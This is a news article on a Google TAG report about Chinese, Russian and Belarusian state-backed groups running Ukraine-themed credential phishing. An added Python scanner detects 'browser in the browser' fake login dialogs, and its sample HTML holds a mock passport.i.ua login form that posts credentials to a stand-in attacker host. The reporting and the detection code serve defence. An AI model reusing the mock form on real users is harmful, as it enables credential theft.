
Russian, Chinese, and Belarusian actors increasingly exploit Ukrainian tragedy for phishing

State-sponsored threat actors from China, Iran, North Korea, Russia, and Belarus, among others, have exploited Ukrainian war-related topics for their financial benefit.

Criminals are using current events in this war-torn Eastern European country to target their victims.

According to Google's Threat Analysis Group (TAG), one actor is impersonating military personnel to extort money for rescuing relatives in Ukraine.

Government-backed actors and many unattributed hacker groups are tricking targets into opening malicious emails and clicking on malicious links.

Over the past two weeks, TAG has observed three particularly active criminal groups trying to monetize the war in Ukraine.

Curious Gorge, backed by China's People's Liberation Army Strategic Support Force, has conducted campaigns against government and military organizations in Ukraine, Russia, Kazakhstan, and Mongolia.

Russia-based Coldriver (Calisto) has launched credential phishing campaigns targeting several US-based NGOs and think tanks, the military of a Balkans country, and a Ukraine-based defense contractor.

"However, for the first time, TAG has observed Coldriver campaigns targeting the military of multiple Eastern European countries, as well as a NATO Centre of Excellence. These campaigns were sent using newly created Gmail accounts to non-Google accounts, so the success rate of these campaigns is unknown. We have not observed any Gmail accounts successfully compromised during these campaigns," Google noted.

Belarusian threat actor Ghostwriter recently introduced a new capability into their credential phishing campaigns – a 'browser in the browser' phishing technique.

"Ghostwriter actors have quickly adopted this new technique, combining it with a previously observed technique, hosting credential phishing landing pages on compromised sites," Google said.

Phishing page
The technique renders a fake login dialog that appears to belong to the passport.i.ua domain on top of the page hosted on the compromised site. Once a user enters credentials into that dialog, they are posted to an attacker-controlled domain.
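The defender-side check this description suggests is a mismatch test: does the host a credential form actually posts to agree with the origin the page visibly claims, or with the site it is hosted on? The following scanner is an added example, not code from the article or from Google TAG; the hostnames compromised-site.example and collector.example and the sample markup are constructed for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample: a page served from a (hypothetical) compromised host draws a
# fake "popup" whose address-bar text claims passport.i.ua, while the embedded
# credential form posts to a third, attacker-controlled host.
PAGE_HOST = "compromised-site.example"
SAMPLE_HTML = """
<div class="fake-window">
  <div class="fake-urlbar">https://passport.i.ua/login</div>
  <form action="https://collector.example/post" method="post">
    <input name="login"><input name="password" type="password">
  </form>
</div>
"""

URL_RE = re.compile(r"https?://[^\s\"'<>]+")


class BitbScanner(HTMLParser):
    """Collects URL-like text shown to the user and the hosts that forms post to."""

    def __init__(self, page_host):
        super().__init__()
        self.page_host = page_host
        self.displayed_hosts = set()   # hosts the page visually claims to be
        self.form_hosts = []           # hosts that receive submitted form data

    def handle_starttag(self, tag, attrs):
        if tag == "form":
            action = dict(attrs).get("action") or ""
            # A relative or empty action posts back to the hosting page itself.
            self.form_hosts.append(urlparse(action).hostname or self.page_host)

    def handle_data(self, data):
        for url in URL_RE.findall(data):
            self.displayed_hosts.add(urlparse(url).hostname)


def find_bitb_indicators(html, page_host):
    """Flag forms whose target host matches neither the displayed origin nor the host."""
    scanner = BitbScanner(page_host)
    scanner.feed(html)
    shown = scanner.displayed_hosts
    return [
        {"form_posts_to": host, "displayed_as": sorted(shown), "hosted_on": page_host}
        for host in scanner.form_hosts
        if shown and host not in shown and host != page_host
    ]
```

A real page would need the same check applied to JavaScript-driven submissions and to fetch/XHR targets, which this HTML-only pass does not see.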

Ghostwriter has also conducted credential phishing campaigns against the Polish and Ukrainian government and military organizations at the beginning of the Russian invasion of Ukraine.

In the last 12 months, Google's Threat Analysis Group has issued hundreds of government-backed attack warnings to Ukrainian users, alerting them that they have been targeted by government-backed hacking, mainly emanating from Russia.

FancyBear, a threat actor attributed to the Russian intelligence agency GRU, has conducted several large credential phishing campaigns targeting ukr.net users. UkrNet is a Ukrainian media company.

China-based threat actor Mustang Panda has targeted European entities with lures related to the Ukrainian invasion.
